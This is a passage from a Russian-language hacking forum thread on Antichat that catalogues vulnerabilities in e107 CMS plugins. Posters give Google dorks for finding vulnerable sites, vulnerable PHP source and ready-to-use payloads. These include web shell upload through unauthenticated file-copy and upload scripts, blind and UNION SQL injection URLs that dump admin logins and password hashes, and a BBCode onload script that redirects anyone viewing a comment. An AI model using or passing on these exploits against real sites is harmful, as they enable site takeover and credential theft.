[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]] += (double)[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]] * ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
}
else {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sc_total'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]] += (double)[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'shipping2'[/COLOR][COLOR="#007700"]] *[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'item_qty'[/COLOR][COLOR="#007700"]];
}
}
}
[/COLOR][COLOR="#FF8000"]// Close the session (before a location redirect: otherwise the variables may not display correctly)
[/COLOR][COLOR="#0000BB"]session_write_close[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]// Return to original url
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'return_url'[/COLOR][COLOR="#007700"]]);
exit();
}[/COLOR][/COLOR]
зы 5 минут поиска!
|
|
|
|
03.09.2010, 16:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
FileDownload Advanced v2.0 by The Hunter
скачать
гугл- inurl:e107_plugins/FileDownload
http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#DD0000"]"functions.php"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]];
else
[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"dir"[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"numfiles"[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$numfiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"numfiles"[/COLOR][COLOR="#007700"]];
else
[/COLOR][COLOR="#0000BB"]$numfiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];
if ((isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"hide"[/COLOR][COLOR="#007700"]])) and (isset([/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"])))
{
for ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]++)
{
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$copy[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$upload_ok[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Uploaded:"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" successfully."[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
./config.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//$expPrefPass='';
[/COLOR][COLOR="#0000BB"]$expBaseDir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$expSortOrder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$expDisplaySearch[/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]Как видно первая строка закоментирована[/COLOR][COLOR="#007700"].
...[/COLOR][/COLOR]
./functions
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);
if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpFileDownload_login"[/COLOR][COLOR="#007700"]]))
if ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"phpFileDownload_login"[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$expPrefPass[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: login.php"[/COLOR][COLOR="#007700"]);...
[/COLOR][COLOR="#0000BB"]И посему нет никакой переадресации если куки не устанавливать[/COLOR][COLOR="#007700"]. ):
...function[/COLOR][COLOR="#0000BB"]getFileName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
while ([/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
if (([/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"]) or ([/COLOR][COLOR="#0000BB"]$_g[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]))
break;
[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$strlen[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}
return[/COLOR][COLOR="#0000BB"]$retfile[/COLOR][COLOR="#007700"];
}...[/COLOR][/COLOR]
Результат:
Сообщение от None
Функция copy
Замечание: Начиная с PHP версии 4.3.0, оба параметра, source и dest, могут быть URL'ами, если были включены "упаковщики fopen"
http://[host]/[path]/FileDownload/filedownload/log/shell.php
ps др. способы заливки
TiltViewer v1.2 by The_Death_Raw
Если уставновлен,то повезло.скачать
Заливаем шельца!
гугл-inurl:e107_plugins/tiltviewer
http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...[/COLOR][COLOR="#FF8000"]// fonction upload
[/COLOR][COLOR="#007700"]foreach ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"error"[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]UPLOAD_ERR_OK[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"tmp_name"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"filez"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"./uploads/[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
}...[/COLOR][/COLOR]
Выбираем наш шелл и Send the files
http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php
ps заходил под админом и тогда лил, хоть и нужны права но мб пригодиться
др. способы заливки
AACGC Hall of Shame v1.6 by ~M@CH!N3~
07:27 02-Apr-10
скачать
Blind SQL inj
гугл- inurl:e107_plugins/aacgc_hos
[path]/e107_plugins/aacgc_hos/HOS_Details.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...require_once([/COLOR][COLOR="#DD0000"]"../../class2.php"[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]HEADERF[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];
unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//------------------------------------------------------------------------------------------------------------
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_hos"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE hos_id =[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();...[/COLOR][/COLOR]
плюс - никаких условий.
минус - надо знать hos_id.
Результат:
Пусть hos_id=1 и 5 ветка
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент!
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента!
ps с "+" контент не выводился (если в гет пихать)
|
|
|
|
03.09.2010, 17:44
|
|
Познающий
Регистрация: 07.02.2009
Сообщений: 89
Провел на форуме:
3029180
Репутация:
106
|
|
Проверял только на 0.7.22 и 0.7.23 Не совсем уязвимость, но можно запороть любой коментарий, будь то на форуме, лс или коментарий к пользователю и к новости.
достаточно вставить
Код:
Code:
[img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img]
0x687474703a2f2f676f6f676c652e7275 - это захекшеный гугл, вставить можно любое
©by sw3n |
|
|
|
21.10.2010, 20:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
AACGC Friend System v.1.1 - плагин e107
скачать с plugins.e107.org
inurl:/e107_plugins/aacgc_friendsys/
Path disclosure
display_errors = on
PoC
Код:
Code:
http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php
http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php
SQL inj
magic_quotes_gpc = Off, нужно быть авторизированым.
/e107_plugins/aacgc_friendsy/Friend_Requests.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]USER[/COLOR][COLOR="#007700"]){
if ([/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'fl_enable_gold'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$gold_obj[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]gold[/COLOR][COLOR="#007700"]();}
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'accept_user'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$newuser[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$newfriend[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_friends'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_friend_sys"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"NULL, '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newuser[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newfriend[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
/e107_handlers/mysql_class.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]db_Insert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$debug[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_remark[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_IsLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLcurTable[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$keyList[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"`,`"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]array_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$valList[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]` ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$keyList[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]) VALUES ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$valList[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'INSERT INTO '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]VALUES ([/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"];
}
if(![/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$db_ConnectionID[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db_ConnectionID[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLresult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'db_Insert'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$debug[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$log_remark[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_insert_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]mySQLaccess[/COLOR][COLOR="#007700"]);
return ([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]TRUE[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// return true even if table doesn't have auto-increment.
[/COLOR][COLOR="#007700"]} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dbError[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"db_Insert ([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#DD0000"])"[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
PoC
SQL inj
надо быть авторизированым.
/e107_plugins/aacgc_friendsys/AddMe.php
Код:
Code:
require_once("../../class2.php");
require_once(HEADERF);
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
if (USER){
$sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."","");
$row = $sql->db_Fetch();
$sql2 = new db;
$sql2->db_Select("user", "*", "WHERE user_id = $sub_action ","");
$row2 = $sql2->db_Fetch();
print_r($row2);
//----------------------------------------------
/*...*/
$text .= "
Are You Sure You Want To Add ".$row2['user_name']." To Your Friends List?
";
/*...*/
Poc:
Код:
Code:
http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
Сообщение от None
Are You Sure You Want To Add admin:21232f297a57a5a743894a0e4a801fc3 To Your Friends List?
|
|
|
|
10.12.2010, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
AACGC Wish List
http://plugins.e107.org/
SQL Injection:
/News_Details.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1
/News.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_cat_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
